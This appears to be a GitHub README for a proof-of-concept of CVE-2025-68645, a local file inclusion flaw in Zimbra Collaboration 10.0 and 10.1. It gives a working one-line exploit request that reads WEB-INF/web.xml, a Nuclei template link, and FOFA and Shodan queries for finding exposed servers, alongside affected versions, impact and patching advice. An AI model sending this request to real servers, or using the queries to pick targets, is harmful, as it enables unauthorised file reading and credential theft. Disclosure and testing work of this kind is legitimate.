📄 Zimbra Collaboration 10.0 / 10.1 Local File Inclusion

# zimbramail-CVE-2025-68645-poc
    
    A proof-of-concept exploiting a Local File Inclusion (LFI) vulnerability existing in the Webmail Classic UI of Zimbra Collaboration (ZCS) 10.0 and 10.1 because of improper handling of user-supplied request parameters in the RestFilter servlet.
    
    # Vulnerability
    
    The vulnerability exists due to improper input validation in the RestFilter servlet. An unauthenticated remote attacker can craft requests to the /h/rest endpoint to influence internal request dispatching, allowing inclusion of arbitrary files from the WebRoot directory.
    
    -   User-controlled parameters are not correctly sanitized.
    -   Internal request routing can be manipulated.
    -   Arbitrary files under the WebRoot directory may be included in server responses.
    
    # Affected Versions
    
    -   Zimbra versions 10.0.x prior to 10.0.18
    -   Zimbra versions 10.1.x prior to 10.1.13
    
    # Poc (by sirifu4k1)
    
    ```
    http://127.0.0.1/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml
    ```
    
    # Automation
    
    Nuclei-Template:
    
    https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-68645.yaml
    
    # Into the wild
    
    FOFA:
    
    ```
    ((title="Zimbra Web Client Sign In") || (title="Zimbra 网络客户端登录"))
    ```
    
    SHODAN:
    
    ```
    http.title:"Zimbra Web Client Sign In"
    ```
    
    # Impact
    
    An unauthenticated remote attackers can include arbitrary files from the WebRoot directory, potentially exposing sensitive information.
    
    -   Read sensitive files (configs, environment data)
    -   Leak credentials or internal paths
    -   Gather intelligence for further exploitation
    -   Chain with other vulnerabilities for deeper compromise
    
    Vector 3.x
    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    / Base Score 3.x
    8.80
    / Severity 3.x
    HIGH
    
    # Remediation & Mitigation
    
    Update to the latest version of Zimbra Collaboration.
    
    -   ZCS 10.0.18
    -   ZCS 10.1.13 and later
    
    Recommended Actions :
    
    1. Upgrade immediately to a patched version
    2. Disable Classic UI if not required
    3. Monitor logs for suspicious access to `/h/rest`
    4. Restrict public access to Zimbra web endpoints where possible
    5. Review WebRoot permissions and exposed files
    
    # References
    
    https://nvd.nist.gov/vuln/detail/CVE-2025-68645
    
    https://wiki.zimbra.com/wiki/Security_Center
    
    https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy
    
    https://x.com/sirifu4k1/status/2006031417088639064
    
    # Disclaimer
    
    This tool is for authorized security testing only. Unauthorized access to computer systems is illegal.